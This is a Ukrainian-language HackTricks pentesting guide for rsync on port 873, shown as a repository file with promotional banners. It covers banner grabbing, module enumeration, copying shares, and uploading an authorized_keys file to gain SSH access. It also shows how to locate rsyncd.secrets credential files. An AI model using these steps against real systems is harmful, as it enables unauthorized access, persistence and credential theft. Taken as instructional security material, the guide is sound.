hacktricks/network-services-pentesting/873-pentesting-rsync.md
2024-03-29 19:49:46 +01:00

111 lines
8.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 873 - Пентестинг Rsync
<details>
<summary><strong>Вивчайте хакінг AWS від нуля до героя з</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Інші способи підтримки HackTricks:
* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)!
* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com)
* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family)
* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
</details>
## **Основна інформація**
З [вікіпедії](https://en.wikipedia.org/wiki/Rsync):
> **rsync** - це утиліта для ефективного [передавання](https://en.wikipedia.org/wiki/File\_transfer) та [синхронізації](https://en.wikipedia.org/wiki/File\_synchronization) [файлів](https://en.wikipedia.org/wiki/Computer\_file) між комп'ютером та зовнішнім жорстким диском та між [мережевими](https://en.wikipedia.org/wiki/Computer\_network) [комп'ютерами](https://en.wikipedia.org/wiki/Computer), порівнюючи [часи змін](https://en.wikipedia.org/wiki/Timestamping\_\(computing\)) та розміри файлів.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) Зазвичай використовується в [операційних системах](https://en.wikipedia.org/wiki/Operating\_system) подібних до Unix. Алгоритм rsync є типом [кодування дельта](https://en.wikipedia.org/wiki/Delta\_encoding) та використовується для мінімізації використання мережі. [Zlib](https://en.wikipedia.org/wiki/Zlib) може використовуватися для додаткового [стиснення даних](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) а [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) або [stunnel](https://en.wikipedia.org/wiki/Stunnel) можуть використовуватися для забезпечення безпеки.
**Порт за замовчуванням:** 873
```
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
```
## Перелік
### Банер та ручне спілкування
```bash
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the sever to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Sever closes the connection
#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
```
### **Перелік загальних папок**
**Модулі Rsync** визначаються як **спільні каталоги**, які можуть бути **захищені паролями**. Для ідентифікації доступних модулів та перевірки, чи потрібні для них паролі, використовуються наступні команди:
```bash
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```
Будьте уважні, що деякі ресурси можуть не відображатися у списку, можливо, вони приховані. Крім того, доступ до деяких ресурсів може бути обмежений конкретними **даними для входу**, що підтверджується повідомленням **"Відмовлено в доступі"**.
### [**Перебір паролів**](../generic-methodologies-and-resources/brute-force.md#rsync)
### Вручному використанні Rsync
Після отримання **списку модулів** дії залежать від того, чи потрібна аутентифікація. Без аутентифікації **перелік** та **копіювання** файлів зі спільної папки в локальний каталог досягається через:
```bash
# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name
# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```
Цей процес **рекурсивно передає файли**, зберігаючи їх атрибути та дозволи.
З **ідентифікаційними даними** список та завантаження зі спільної папки можна виконати наступним чином, де з'явиться запит на пароль:
```bash
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
```
Для **завантаження вмісту**, такого як файл _**authorized_keys**_ для доступу, використовуйте:
```bash
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
```
## POST
Для знаходження файлу конфігурації rsyncd виконайте:
```bash
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```
У цьому файлі параметр _secrets file_ може вказувати на файл, що містить **імена користувачів та паролі** для аутентифікації rsyncd.
## Посилання
* [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html)
<details>
<summary><strong>Вивчайте хакінг AWS від нуля до героя з</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Інші способи підтримки HackTricks:
* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)!
* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com)
* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family)
* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
</details>